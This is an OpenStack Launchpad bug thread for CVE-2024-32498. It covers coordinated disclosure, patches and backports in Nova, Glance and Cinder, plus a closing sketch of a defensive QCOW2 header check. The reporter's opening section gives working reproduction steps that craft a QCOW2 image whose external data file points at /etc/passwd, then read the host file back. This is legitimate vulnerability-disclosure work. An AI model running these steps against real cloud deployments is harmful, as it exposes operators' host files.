[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

Bug #2059809 reported by Martin Kaesberger
This bug affects 4 people
| Affects | Status | Importance | Assigned to | Milestone |
| --- | --- | --- | --- | --- |
| Cinder | Fix Released | Critical | Brian Rosmaita | |
| Glance | Fix Released | Critical | Dan Smith | |
| OpenStack Compute (nova) | Fix Released | Critical | Sylvain Bauza | |
| OpenStack Security Advisory | Fix Released | High | Jeremy Stanley | |
| Ubuntu Cloud Archive | Fix Released | Undecided | Unassigned | |
| Antelope | Fix Released | Undecided | Unassigned | |
| Bobcat | Fix Released | Undecided | Unassigned | |
| Caracal | Fix Released | Undecided | Unassigned | |
| Ussuri | Fix Committed | Undecided | Unassigned | |
| Yoga | Fix Released | Undecided | Unassigned | |

Bug Description

OpenStack has a security vulnerability in Nova or Glance that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

Steps to Reproduce:

- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

With the non-bootable instance there might be two ways to continue:

Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0

Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and log in to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Since this report concerns a possible security risk, an incomplete
security advisory task has been added while the core security
reviewers for the affected project or projects confirm the bug and
discuss the scope of any vulnerability along with potential
solutions.

description: updated
Changed in ossa:
status: New → Incomplete
Revision history for this message
Jeremy Stanley (fungi) wrote :

My initial impression is that this seems like a fairly similar situation to https://security.openstack.org/ossa/OSSA-2023-002.html in which case we may want to involve the Cinder and Glance security reviewers too, but we'll start with Nova and see where it leads.

Revision history for this message
Dan Smith (danms) wrote :

It's also similar to an earlier one specifically referring to qcow files. We currently protect against the backing file of a qcow pointing somewhere, but it looks like this data_file option provides another route to get similar functionality. We will probably need similar mitigations in the same area we currently have them for backing files in nova, glance, and cinder.

Revision history for this message
Dan Smith (danms) wrote :

We're also all (I think) now using oslo.utils/imageutils to probe the qcow files. AFAICT, that does not expose the general list of extra options, so we'll need to augment oslo.utils as well.

EDIT: Yeah, it does, under "format-specific"

Revision history for this message
Dan Smith (danms) wrote :

Proposed patch to nova to detect and reject qcow2 images with data-file set

Revision history for this message
Dan Smith (danms) wrote :

Proposed patch to glance to detect and reject qcow2 images with data-file set

Revision history for this message
Dan Smith (danms) wrote :

I subscribed Brian Rosmaita who can evaluate the cinder impact and also review the glance patch.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Added Eric Harney for cinder.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Guess I should state explicitly that this also affects cinder, when it converts an image to raw format to write to a volume.

Revision history for this message
Sylvain Bauza (sylvain-bauza) wrote :

I agree with the design proposal which is about not accepting an image with a data-file set.
Nova doesn't need to use an external disk for a guest, so we could no longer support it.

I'll look at Dan's patch today.

Revision history for this message
Sylvain Bauza (sylvain-bauza) wrote :

Nova's patch proposed by Dan relies on the same mitigation provided in https://security.openstack.org/ossa/OSSA-2023-002.html where we rely on metadata that was added in oslo.utils's imageutils.py module by https://github.com/openstack/oslo.utils/commit/2180db82b605cf84902ee379fffc0b34e17e92c7

This sounds to me like the correct approach, as we can backport it down to the last Maintained releases, but any distro can also backport it further down to Ussuri if they want (exactly like OSSA-2023-002).

+1 on nova-2059809.patch but I'll test it on a dev environment.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Martin Kaesberger: Did you notify any organizations about this other than reporting the bug to us? I just received a request from a public cloud provider for access to the bug report, which means the private embargo has been broken and we probably need to disclose this by switching to our public workflow immediately rather than continuing to work on it in private.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Updated cinder patch to include a release note.

Revision history for this message
Jeremy Stanley (fungi) wrote :

For now I'm subscribing some technical representatives from OVH (the provider on whose behalf I was contacted), on the assumption they were the only outside organization notified, so that they might assist with reviewing and testing the proposed fixes.

Revision history for this message
Arnaud Morin (arnaud-morin) wrote :
Revision history for this message
Arnaud Morin (arnaud-morin) wrote :
Revision history for this message
Arnaud Morin (arnaud-morin) wrote :
Revision history for this message
Martin Kaesberger (mkaesberger) wrote :

Jeremy Stanley: The reference to the production system in the report refers to the fact that it was discovered in the OVHcloud. I reported it to them in private first and was referred here.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Thanks for confirming. In this case it seems like we should be able to continue working on this in private for now, with added assistance from folks at OVH.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Dan's glance-2059809.patch LGTM.

Changed in cinder:
status: New → In Progress
importance: Undecided → Critical
assignee: nobody → Brian Rosmaita (brian-rosmaita)
Changed in glance:
status: New → In Progress
importance: Undecided → Critical
assignee: nobody → Dan Smith (danms)
Changed in nova:
status: New → In Progress
Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2024.1

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2023.2

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2023.1

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for zed

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2024.1

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2023.2

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2023.1

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for zed

Revision history for this message
Eric Harney (eharney) wrote :

brian-rosmaita's cinder-2059809.patch from comment #16 looks good to me.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2024.1 (Caracal)

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2023.2 (Bobcat).

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2023.1 (Antelope)

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for Zed.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for unmaintained/yoga, as a courtesy.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

@arnaud-morin: would you mind deleting your patches so that people don't get confused? Thanks!

Revision history for this message
Jeremy Stanley (fungi) wrote :

Martin Kaesberger: If there's any organization you're affiliated with and you'd like it credited along with your name, please let me know.

Here's a draft impact description, a quick review for any inaccuracies is appreciated so I can request a CVE assignment with it...

title: Arbitrary file access through custom QCOW2 external data

description: >
  Martin Kaesberger reported a vulnerability in QCOW2 image processing for
  Cinder, Glance and Nova. By supplying a specially created QCOW2 image which
  references a specific data file path, an authenticated user may convince
  systems to return a copy of that file's contents from the server resulting in
  unauthorized access to potentially sensitive data. All Cinder deployments are
  affected; only Glance deployments with image conversion enabled are affected;
  all Nova deployments are affected.

affected-products:
  - product: Cinder
    version: '<21.3.3, >=22.0.0 <22.1.2, >=23.0.0 <23.1.1, ==24.0.0'
  - product: Glance
    version: '<25.1.1, ==26.0.0, ==27.0.0, >=28.0.0 <28.0.2'
  - product: Nova
    version: '<26.2.3, >=27.0.0 <27.2.1, >=28.0.0 <28.0.2, >=29.0.0 <29.0.2'

Jeremy Stanley (fungi)
Changed in ossa:
status: Incomplete → Confirmed
importance: Undecided → High
assignee: nobody → Jeremy Stanley (fungi)
status: Confirmed → Triaged
Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Draft description LGTM, and the version lists check out.

Jeremy Stanley (fungi)
Changed in ossa:
status: Triaged → In Progress
Jeremy Stanley (fungi)
summary: - Arbitrary file access through QCOW2 external data file
+ Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
Jeremy Stanley (fungi)
description: updated
Changed in nova:
importance: Undecided → Critical
assignee: nobody → Sylvain Bauza (sylvain-bauza)
Jeremy Stanley (fungi)
summary: - Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
+ [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
+ (CVE-2024-32498)
Jeremy Stanley (fungi)
description: updated
information type: Private Security → Public Security
Changed in ossa:
status: In Progress → Fix Released
Changed in nova:
status: In Progress → Fix Released
Changed in cinder:
status: In Progress → Fix Released
Changed in glance:
status: In Progress → Fix Released
tags: added: in-unmaintained-zed
Revision history for this message
Chris Valean (cvalean) wrote :

When is this planned to be fix released for Ussuri as well?

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/glance 26.1.0

This issue was fixed in the openstack/glance 26.1.0 release.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/glance 27.1.0

This issue was fixed in the openstack/glance 27.1.0 release.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/glance 28.1.0

This issue was fixed in the openstack/glance 28.1.0 release.

Revision history for this message
Abhishek Kekane (abhishek-kekane) wrote :

@Chris

Currently Ussuri is unmaintained and we are not planning to make any changes there. But if you see comment #231 from Dan, you can create a similar change for Ussuri locally.

https://bugs.launchpad.net/nova/+bug/2059809/comments/231

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (stable/2024.1)

Related fix proposed to branch: stable/2024.1
Review: https://review.opendev.org/c/openstack/nova/+/923724

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (stable/2023.2)

Related fix proposed to branch: stable/2023.2
Review: https://review.opendev.org/c/openstack/nova/+/923729

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (stable/2023.1)

Related fix proposed to branch: stable/2023.1
Review: https://review.opendev.org/c/openstack/nova/+/923733

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/nova 27.4.0

This issue was fixed in the openstack/nova 27.4.0 release.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/nova 28.2.0

This issue was fixed in the openstack/nova 28.2.0 release.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/nova 29.1.0

This issue was fixed in the openstack/nova 29.1.0 release.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/cinder 22.2.0

This issue was fixed in the openstack/cinder 22.2.0 release.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/cinder 23.2.0

This issue was fixed in the openstack/cinder 23.2.0 release.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/cinder 24.1.0

This issue was fixed in the openstack/cinder 24.1.0 release.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to cinder (unmaintained/yoga)

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/cinder/+/923873

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to nova (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923298
Committed: https://opendev.org/openstack/nova/commit/da352edceb74dbd715268f94516503042b48cc90
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit da352edceb74dbd715268f94516503042b48cc90
Author: Dan Smith <email address hidden>
Date: Wed Apr 17 07:06:13 2024 -0700

    Check images with format_inspector for safety

    It has been asserted that we should not be calling qemu-img info
    on untrusted files. That means we need to know if they have a
    backing_file, data_file or other unsafe configuration *before* we use
    qemu-img to probe or convert them.

    This grafts glance's format_inspector module into nova/images so we
    can use it to check the file early for safety. The expectation is that
    this will be moved to oslo.utils (or something) later and thus we will
    just delete the file from nova and change our import when that happens.

    NOTE: This includes whitespace changes from the glance version of
    format_inspector.py because of autopep8 demands.

    Change-Id: Iaefbe41b4c4bf0cf95d8f621653fdf65062aaa59
    Closes-Bug: #2059809
    (cherry picked from commit 9cdce715945619fc851ab3f43c97fab4bae4e35a)
    (cherry picked from commit f07fa55fd86726eeafcd4c0c687bc49dd4df9f4c)
    (cherry picked from commit 0acf5ee7b5dfb6ff0f9a9745f5ad2a0ed2bf65bf)
    (cherry picked from commit 67e5376dd64407f5aaf1ea5f8c896e356064a2c9)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923300
Committed: https://opendev.org/openstack/nova/commit/a2acb31d790e6cb41c067bfc0343bde274c9428c
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit a2acb31d790e6cb41c067bfc0343bde274c9428c
Author: Dan Smith <email address hidden>
Date: Mon Jul 1 09:06:40 2024 -0700

    Fix vmdk_allowed_types checking

    This restores the vmdk_allowed_types checking in create_image()
    that was unintentionally lost by tightening the
    qemu-type-matches-glance code in the fetch patch recently. Since we
    are still detecting the format of base images without metadata, we
    would have treated a vmdk file that claims to be raw as raw in fetch,
    but then read it like a vmdk once it was used as a base image for
    something else.

    Conflicts:
      nova/tests/unit/virt/libvirt/test_utils.py

    NOTE(elod.illes): conflicts are due to encryption support adding patch
    I5d6d2a7b03b5ace0826af80c4004de852579ff12 was introduced in zed.

    Change-Id: I07b332a7edb814f6a91661651d9d24bfd6651ae7
    Related-Bug: #2059809
    (cherry picked from commit 08be7b2a0dc1d7728d8034bc2aab0428c4fb642e)
    (cherry picked from commit 11301e7e3f0d81a3368632f90608e30d9c647111)
    (cherry picked from commit 70a435fd519a0ebcc3ac9ad5254fefbf19c93e48)
    (cherry picked from commit f732f8476851e6272d8ad9937f54b918795844e8)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (master)

Related fix proposed to branch: master
Review: https://review.opendev.org/c/openstack/nova/+/923924

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (stable/2024.1)

Related fix proposed to branch: stable/2024.1
Review: https://review.opendev.org/c/openstack/nova/+/923935

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (stable/2023.2)

Related fix proposed to branch: stable/2023.2
Review: https://review.opendev.org/c/openstack/nova/+/923936

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (stable/2023.1)

Related fix proposed to branch: stable/2023.1
Review: https://review.opendev.org/c/openstack/nova/+/923937

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2024.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923724
Committed: https://opendev.org/openstack/nova/commit/eeda7c333c773216c216159926673874ce4843ba
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit eeda7c333c773216c216159926673874ce4843ba
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (master)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923924
Committed: https://opendev.org/openstack/nova/commit/c6d8c6972d52845774b36acb84cd08a4b2e4dcde
Submitter: "Zuul (22348)"
Branch: master

commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2024.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923935
Committed: https://opendev.org/openstack/nova/commit/a8783a767551df3dd943bd862cdba35c51cdb7a6
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit a8783a767551df3dd943bd862cdba35c51cdb7a6
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.2)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923729
Committed: https://opendev.org/openstack/nova/commit/24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to nova (unmaintained/yoga)

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924081

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924082

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (unmaintained/yoga)

Related fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924084

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.2)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923936
Committed: https://opendev.org/openstack/nova/commit/02147b36d35e1e462e1405c36a2e67a33de806de
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 02147b36d35e1e462e1405c36a2e67a33de806de
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923733
Committed: https://opendev.org/openstack/nova/commit/65f0789df05e2ba7f11c0eaf2c6959367acbced2
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 65f0789df05e2ba7f11c0eaf2c6959367acbced2
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)
    (cherry picked from commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to cinder (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/cinder/+/923314
Committed: https://opendev.org/openstack/cinder/commit/4aa6590a483901de64e0d162fff11f3d2d7f9977
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 4aa6590a483901de64e0d162fff11f3d2d7f9977
Author: Brian Rosmaita <email address hidden>
Date: Wed Jun 26 14:09:30 2024 -0400

    CVE-2024-32498: Check for external qcow2 data file

    Adds code to image_utils to check for a qcow2 external data
    file, a recent feature of qemu which we do not support and
    which can be used maliciously.

    Advice from the qemu-img community is that it is dangerous
    to call qemu-img info on untrusted files, so we copy over
    the format_inspector module from Glance. This performs basic
    analysis on the image data file so we can detect problematic
    images before we call qemu-img info to get all the image
    attributes. It is expected that this code will eventually be
    added to oslo so it can be consumed by Glance, Cinder, and
    Nova.

    Because cinder itself may create qcow2 format images with a
    backing file in nfs-based backends, the glance format_inspector
    has been modified to optionally allow such files. Since we are
    monkeying with the format_inspector code, we also copy over
    its unit tests to prevent regressions and to add tests for the
    changed code.

    Includes an additional fix to prevent an issue where a user
    could mount a raw volume and write a qcow2 header with a larger
    virtual size on it. On reattaching the volume it would have the
    new larger virtual size available without actually changing
    the size value in cinder. While we cannot prevent this we can
    prevent the user from using this volume again, which makes this
    exploit pointless.

    Co-authored-by: Dan Smith <email address hidden>
    Co-authored-by: Felix Huettner <email address hidden>

    Change-Id: I65857288b797cde573e7443ac6e7e6f57fedde01
    Closes-bug: #2059809
    (cherry picked from commit d6a186945e03649343af55b46ed8dfe0dd326e40)
    (cherry picked from commit db98dc207060da234c32a563c13cac1edbd62952)
    (cherry picked from commit 9e667b02b2c20b4ada18c1a472be152956284d45)
    (cherry picked from commit 5f5e86e3542866227b7339713148b5169d069f21)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923937
Committed: https://opendev.org/openstack/nova/commit/47428f6caf503b94583dac614b59971f60a0ba9c
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 47428f6caf503b94583dac614b59971f60a0ba9c
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)
    (cherry picked from commit 02147b36d35e1e462e1405c36a2e67a33de806de)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to glance (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923304
Committed: https://opendev.org/openstack/glance/commit/6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Author: Dan Smith <email address hidden>
Date: Mon Apr 1 08:06:31 2024 -0700

    Reject qcow files with data-file attributes

    Change-Id: I6326a3e85c1ba4cb1da944a4323769f2399ed2c1
    Closes-Bug: #2059809
    (cherry picked from commit 2ca29af4433e9fa99a0a48e230d8d25d6eaa4a87)
    (cherry picked from commit c3586f3a122f6cb0663217b12b52203e74e2e4fa)
    (cherry picked from commit a92c438fb5ba55440b38cae7c8b4361b58daa9dd)
    (cherry picked from commit dba3bdb458aa8a5d0193f12b7f1e374a89ed34a2)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923305
Committed: https://opendev.org/openstack/glance/commit/f32d5b8ad865113d499a36f7507a085f583514f9
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit f32d5b8ad865113d499a36f7507a085f583514f9
Author: Dan Smith <email address hidden>
Date: Tue Apr 16 10:29:10 2024 -0700

    Extend format_inspector for QCOW safety

    This adds two properties to the QcowInspector that make it able to
    indicate whether the file specifies a backing_file or data_file in the
    header. Both conditions are considered unsafe for our usage. To
    ease checking of this condition, a classmethod is added that takes
    a local filename and digests just enough of the file to assert that
    both conditions are false.

    Change-Id: Iaf86b525397d41bd116999cabe0954a0a7efac65
    Related-Bug: #2059809
    (cherry picked from commit ae536bb394793c9a7a219cb498e03d5c81dbbbb7)
    (cherry picked from commit 2eba54e0821106097dfeceb424e53943fd090483)
    (cherry picked from commit 89dbbc838d606f461087e1494d19ddbcf9db0a38)
    (cherry picked from commit 4860024286256b028fabc5ed50274934c3dfdd8a)
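
The header-level check that the format_inspector commit messages above describe (a backing file or data file declared in the QCOW2 header, found without running `qemu-img info` on the untrusted file), sketched as an added example. It is not the glance, nova or cinder code: the function names are hypothetical, the sample headers are constructed, and the field offsets and extension type follow the QCOW2 format specification.

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"
INCOMPAT_EXTERNAL_DATA = 1 << 2   # incompatible_features bit 2
EXT_END = 0x00000000              # end of the header extension area
EXT_DATA_FILE = 0x44415441        # external data file name extension


def qcow2_unsafe_reasons(buf):
    """Return the reasons a qcow2 header must be rejected ([] if none).

    `buf` holds the first bytes of the image. Anything that cannot be
    parsed completely is rejected as well (fail closed).
    """
    if len(buf) < 72 or buf[:4] != QCOW2_MAGIC:
        return ["not a qcow2 header"]
    version, backing_off, backing_len = struct.unpack_from(">IQI", buf, 4)
    reasons = []
    if backing_off or backing_len:
        name = buf[backing_off:backing_off + backing_len]
        reasons.append("backing file: %r" % name.decode("utf-8", "replace"))
    if version == 2:
        incompat, header_len = 0, 72
    elif version == 3 and len(buf) >= 104:
        (incompat,) = struct.unpack_from(">Q", buf, 72)
        (header_len,) = struct.unpack_from(">I", buf, 100)
        if header_len < 104:
            return reasons + ["bad header length"]
    else:
        return reasons + ["unsupported version or truncated header"]
    if incompat & INCOMPAT_EXTERNAL_DATA:
        reasons.append("external data file feature bit set")
    # Header extensions: u32 type, u32 length, data padded to 8 bytes.
    pos = header_len
    while True:
        if pos + 8 > len(buf):
            reasons.append("header extensions truncated")
            break
        ext_type, ext_len = struct.unpack_from(">II", buf, pos)
        if ext_type == EXT_END:
            break
        if pos + 8 + ext_len > len(buf):
            reasons.append("header extensions truncated")
            break
        if ext_type == EXT_DATA_FILE:
            name = buf[pos + 8:pos + 8 + ext_len].decode("utf-8", "replace")
            reasons.append("data file extension: %r" % name)
        pos += 8 + ((ext_len + 7) & ~7)
    return reasons


def sample_header(data_file=None, backing=None):
    """Constructed v3 header bytes for testing the check (not a usable image)."""
    incompat = INCOMPAT_EXTERNAL_DATA if data_file else 0
    ext = b""
    if data_file:
        padded = data_file + b"\0" * (-len(data_file) % 8)
        ext += struct.pack(">II", EXT_DATA_FILE, len(data_file)) + padded
    ext += struct.pack(">II", EXT_END, 0)
    backing_off = 104 + len(ext) if backing else 0
    hdr = QCOW2_MAGIC + struct.pack(
        ">IQIIQIIQQIIQQQQII", 3, backing_off, len(backing or b""),
        16, 1 << 30, 0, 0, 0, 0, 0, 0, 0, incompat, 0, 0, 4, 104)
    return hdr + ext + (backing or b"")


if __name__ == "__main__":
    for label, hdr in [
        ("plain", sample_header()),
        ("data file", sample_header(data_file=b"placeholder.raw")),
        ("backing file", sample_header(backing=b"base.img")),
    ]:
        print(label, "->", qcow2_unsafe_reasons(hdr) or "ok")
```

An image service would run this on the uploaded bytes before any `qemu-img` call and refuse the image whenever the returned list is non-empty.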
